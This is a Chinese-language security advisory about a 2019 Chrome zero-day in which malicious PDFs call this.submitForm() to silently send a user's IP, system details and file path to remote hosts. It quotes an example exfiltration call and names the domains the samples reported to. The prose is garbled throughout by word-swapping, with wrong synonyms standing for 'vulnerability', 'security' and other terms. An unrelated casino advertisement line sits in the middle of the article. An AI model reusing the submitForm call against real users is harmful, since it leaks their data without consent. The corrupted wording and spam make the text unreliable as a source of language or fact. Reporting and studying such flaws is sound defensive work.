首页 > 清静研究 > 清静转达 > 清静通告

恶意PDF文件使用Chrome浏览器0day误差清静通告

宣布时间 2019-03-01

误差编号和级别

CVE编号：暂无，危险级别：高危， CVSS分值：官方未评定

影响规模

受影响版本：

Google Chrome浏览器所有版本

误差概述

近期，来自外洋的清静研究职员在野外检测到多个PDF恶意样本。这些样本使用了Chrome浏览器的0day误差，以实现追踪用户并悄悄某些网络用户信息的目的。

现在发明了两组使用Chrome零日误差的恶意PDF文件，其中一组文件在2017年10月撒播，另一组文件在2018年9月撒播。第一批恶意PDF文件将用户数据发送回“readnotify.com”，第二批发送回“zuxjk0dftoamimorjl9dfhr44vap3fr7ovgi76w.burpcollaborator.net”。

误差的泉源在于this.submitForm()这个PDF Javascript API。像this.submitForm('http://google.com/test')这样一个简朴的挪用就会导致Chrome把小我私家信息发送到google.com�？赡鼙恍孤兜男畔ǎ�

1.用户的公共IP地点。

2.操作系统，Chrome版本等(在HTTP POST header中)。

3.用户盘算机上PDF文件的完整路径(在HTTP POST payload中)。

当用户使用Chrome浏览器翻开这些恶意样本时，样本会运行恶意代码，在未经用户批准的情形下，以HTTP POST数据包的形式将一些用户信息静默发送到指定域“readnotify.com ”。

尊龙凯时·(中国区)人生就是搏!

除去信息泄露以外，该误差暂未发明其它使用方法，但毫无疑问，这些泄露的用户信息可以资助攻击者举行更多运动。

修复建议

现在该0day误差尚未有官方补丁，但Chrome团队或许将于4月尾修复该误差。

暂时缓解步伐：

在补丁宣布之前，建议用户使用PDF阅读器应用程序在外地审查PDF文档，直到Chrome修复误差�；蛟贑hrome中翻开PDF文档时断开盘算机与Internet的毗连。

参考链接

https://blog.edgespot.io/2019/02/edgespot-detects-pdf-zero-day-samples.html

7*24小时服务热线

400-624-3900

+86(10)56631988(港澳专线)

官方微信

官方微博

网御星云合众数据书生电子云子可信

执法声明

软件升级

投资者关系